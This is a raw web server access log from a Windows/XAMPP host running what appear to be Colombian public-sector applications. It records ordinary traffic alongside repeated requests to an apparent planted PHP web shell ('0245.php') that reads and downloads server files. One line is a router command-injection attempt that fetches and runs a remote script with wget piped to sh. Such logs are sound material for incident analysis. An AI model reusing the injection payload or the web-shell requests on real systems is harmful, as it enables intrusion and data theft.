181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
216.244.66.195 - - [13/Jun/2024:07:58:51 -0500] "GET /BLA/resoluciones/AUTOS%202016/1929.pdf HTTP/1.1" 200 573201
181.237.30.29 - - [13/Jun/2024:07:58:51 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
47.128.119.120 - - [13/Jun/2024:07:58:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion22%5C&f=jquery.min.js&ft=notepad&white=1 HTTP/1.1" 200 96381
181.237.30.29 - - [13/Jun/2024:07:58:52 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65252
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
47.128.119.2 - - [13/Jun/2024:07:59:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-a11y.js&ft=notepad&white=1 HTTP/1.1" 200 832
181.237.30.29 - - [13/Jun/2024:07:59:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 41526
181.237.30.29 - - [13/Jun/2024:07:59:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50248
181.237.30.29 - - [13/Jun/2024:07:59:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23317
3.147.242.204 - - [13/Jun/2024:07:59:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0785.pdf&ft=info HTTP/1.1" 200 324296
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 117134
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:59:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.125.200 - - [13/Jun/2024:07:59:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=listidxm.mer&ft=notepad&white=1 HTTP/1.1" 200 151
216.244.66.195 - - [13/Jun/2024:07:59:13 -0500] "GET /BLA/resoluciones/AUTOS%202016/2215.pdf HTTP/1.1" 200 382734
47.128.99.200 - - [13/Jun/2024:07:59:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=index.php&ft=notepad HTTP/1.1" 200 418
47.128.41.250 - - [13/Jun/2024:07:59:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=install.php&ft=code&white=1 HTTP/1.1" 200 5316
201.245.192.253 - - [13/Jun/2024:07:59:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [13/Jun/2024:07:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202016/2275.pdf HTTP/1.1" 200 357583
18.224.38.99 - - [13/Jun/2024:07:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0815.pdf&ft=download&white=1 HTTP/1.1" 200 353749
191.95.48.121 - - [13/Jun/2024:07:59:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36877
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:59:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.31.95 - - [13/Jun/2024:07:59:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal%5C&f=norma_menu.php&ft=img&white=1 HTTP/1.1" 200 5591
172.22.2.4 - - [13/Jun/2024:07:57:59 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 56779
191.95.48.121 - - [13/Jun/2024:07:59:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
191.95.48.121 - - [13/Jun/2024:07:59:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
191.95.48.121 - - [13/Jun/2024:07:59:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
191.95.48.121 - - [13/Jun/2024:07:59:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
47.128.99.161 - - [13/Jun/2024:07:59:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=ms-upgrade-network.php&ft=notepad HTTP/1.1" 200 232
191.95.48.121 - - [13/Jun/2024:07:59:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
191.95.48.121 - - [13/Jun/2024:07:59:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 30133
191.95.48.121 - - [13/Jun/2024:07:59:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
216.244.66.195 - - [13/Jun/2024:07:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202016/2528.pdf HTTP/1.1" 200 525347
186.102.11.141 - - [13/Jun/2024:07:59:57 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 14105
186.102.11.141 - - [13/Jun/2024:07:59:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 399696
47.128.40.68 - - [13/Jun/2024:07:59:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cschema%5C&f=Dia_Relation_Schema.class.php&ft=notepad&white=1 HTTP/1.1" 200 27030
191.95.48.121 - - [13/Jun/2024:08:00:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50149
186.102.11.141 - - [13/Jun/2024:08:00:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0109.pdf HTTP/1.1" 200 402085
186.102.11.141 - - [13/Jun/2024:08:00:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0109.pdf HTTP/1.1" 206 1025
186.102.11.141 - - [13/Jun/2024:08:00:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0109.pdf HTTP/1.1" 200 402085
47.128.31.250 - - [13/Jun/2024:08:00:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Clib%5C&f=tomcat-i18n-es.jar&ft=notepad&white=1 HTTP/1.1" 200 77364
191.95.48.121 - - [13/Jun/2024:08:00:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 63706
216.244.66.195 - - [13/Jun/2024:08:00:16 -0500] "GET /BLA/resoluciones/AUTOS%202016/2807.pdf HTTP/1.1" 200 385043
3.137.217.10 - - [13/Jun/2024:08:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4974.pdf&ft=sdb HTTP/1.1" 200 3015
191.95.48.121 - - [13/Jun/2024:08:00:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 20116
47.128.27.48 - - [13/Jun/2024:08:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=media-models.js&ft=notepad&white=1 HTTP/1.1" 200 20162
191.95.48.121 - - [13/Jun/2024:08:00:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 20124
47.128.111.15 - - [13/Jun/2024:08:00:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page25.swf&ft=notepad HTTP/1.1" 200 164582
201.245.192.253 - - [13/Jun/2024:08:00:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [13/Jun/2024:08:00:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e481752881b84f22b743a1054ef89b00.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.95.48.121 - - [13/Jun/2024:08:00:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 20116
216.244.66.195 - - [13/Jun/2024:08:00:36 -0500] "GET /BLA/resoluciones/AUTOS%202016/2853.pdf HTTP/1.1" 200 376574
47.128.27.76 - - [13/Jun/2024:08:00:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=options-general.php&ft=notepad&white=1 HTTP/1.1" 200 16522
18.117.74.237 - - [13/Jun/2024:08:00:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1899.pdf&ft=download HTTP/1.1" 200 608834
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12419
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [13/Jun/2024:08:00:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a750be208357415f9567860caba0fe0f.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.59.51 - - [13/Jun/2024:08:00:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=options-head.php&ft=notepad&white=1 HTTP/1.1" 200 492
191.95.48.121 - - [13/Jun/2024:08:00:51 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2216
191.95.48.121 - - [13/Jun/2024:08:00:51 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16502
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:00:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [13/Jun/2024:08:00:53 -0500] "GET /BLA/resoluciones/AUTOS%202016/2987.pdf HTTP/1.1" 200 607567
191.95.48.121 - - [13/Jun/2024:08:00:54 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
47.128.59.56 - - [13/Jun/2024:08:00:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=post-new.php&ft=notepad&white=1 HTTP/1.1" 200 2523
191.95.48.121 - - [13/Jun/2024:08:00:56 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65252
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:08:01:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
216.244.66.195 - - [13/Jun/2024:08:01:11 -0500] "GET /BLA/resoluciones/AUTOS%202016/3097.pdf HTTP/1.1" 200 380846
191.95.48.121 - - [13/Jun/2024:08:00:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 16808
47.128.17.137 - - [13/Jun/2024:08:01:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=class-feed.php&ft=notepad&white=1 HTTP/1.1" 200 3932
216.244.66.195 - - [13/Jun/2024:08:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202016/0032.pdf HTTP/1.1" 200 464432
47.128.17.153 - - [13/Jun/2024:08:01:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=php.php&white=1 HTTP/1.1" 200 148
18.222.117.35 - - [13/Jun/2024:08:01:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4060.pdf&ft=edit HTTP/1.1" 200 3103
201.245.192.253 - - [13/Jun/2024:08:01:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [13/Jun/2024:08:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202007/1531.pdf HTTP/1.1" 200 93974
47.128.17.157 - - [13/Jun/2024:08:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page6_thumbnail.jpg&ft=download HTTP/1.1" 200 4543
13.58.120.6 - - [13/Jun/2024:08:01:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0206.pdf&ft=txt HTTP/1.1" 200 3007
47.128.111.240 - - [13/Jun/2024:08:01:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150714-2013-377000.txt&ft=notepad&white=1 HTTP/1.1" 200 783
216.244.66.195 - - [13/Jun/2024:08:01:55 -0500] "GET /BLA/resoluciones/AUTOS%202007/1858.pdf HTTP/1.1" 200 91321
18.119.104.160 - - [13/Jun/2024:08:01:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1631.pdf&ft=exe&white=1 HTTP/1.1" 200 3062
47.128.55.93 - - [13/Jun/2024:08:01:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp%5C&f=phpDE03.tmp&ft=notepad HTTP/1.1" 200 225236
191.95.48.121 - - [13/Jun/2024:08:01:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23187
13.59.114.44 - - [13/Jun/2024:08:02:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3400.pdf&ft=txt HTTP/1.1" 200 3006
47.128.17.193 - - [13/Jun/2024:08:01:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=SusanaPOT.flv&ft=code&white=1 HTTP/1.1" 200 10813142
216.244.66.195 - - [13/Jun/2024:08:02:07 -0500] "GET /BLA/resoluciones/AUTOS%202007/1899.pdf HTTP/1.1" 200 100710
47.128.56.135 - - [13/Jun/2024:08:02:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=edit-form-comment.php&ft=notepad&white=1 HTTP/1.1" 200 7291
216.244.66.195 - - [13/Jun/2024:08:02:18 -0500] "GET /BLA/resoluciones/AUTOS%202010/0376.pdf HTTP/1.1" 200 180667
201.245.192.253 - - [13/Jun/2024:08:02:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.29.190 - - [13/Jun/2024:08:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5CText%5C&f=Diff.php&ft=notepad HTTP/1.1" 200 11945
185.191.127.212 - - [13/Jun/2024:08:02:24 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.244.66.195 - - [13/Jun/2024:08:02:28 -0500] "GET /BLA/resoluciones/AUTOS%202010/0481.pdf HTTP/1.1" 200 181635
47.128.38.201 - - [13/Jun/2024:08:02:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=upgrade-functions.php&white=1 HTTP/1.1" 200 349
18.118.27.125 - - [13/Jun/2024:08:02:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0261.pdf&ft=edit HTTP/1.1" 200 3103
201.245.192.253 - - [13/Jun/2024:08:02:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [13/Jun/2024:08:02:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e481752881b84f22b743a1054ef89b00.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [13/Jun/2024:08:02:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/1431.pdf HTTP/1.1" 200 238133
47.128.22.180 - - [13/Jun/2024:08:02:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=SecretarioBonn.flv&ft=notepad HTTP/1.1" 200 5230271
216.244.66.195 - - [13/Jun/2024:08:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202010/2420.pdf HTTP/1.1" 200 1456218
201.245.192.253 - - [13/Jun/2024:08:02:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a750be208357415f9567860caba0fe0f.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [13/Jun/2024:08:02:53 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [13/Jun/2024:08:02:55 -0500] "GET /BLA/resoluciones/AUTOS%202010/3122.pdf HTTP/1.1" 200 112414
47.128.98.131 - - [13/Jun/2024:08:02:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-cron.php&ft=notepad HTTP/1.1" 200 3115
216.244.66.195 - - [13/Jun/2024:08:03:01 -0500] "GET /BLA/resoluciones/AUTOS%202010/3452.pdf HTTP/1.1" 200 504840
191.95.48.121 - - [13/Jun/2024:08:03:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 20425
208.100.26.244 - - [13/Jun/2024:08:03:05 -0500] "GET / HTTP/1.1" 200 319
191.95.48.121 - - [13/Jun/2024:08:03:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23187
47.128.98.163 - - [13/Jun/2024:08:03:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=nav-menu.js&ft=notepad&white=1 HTTP/1.1" 200 40232
47.128.47.132 - - [13/Jun/2024:08:03:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1777.pdf&ft=notepad HTTP/1.1" 200 319177
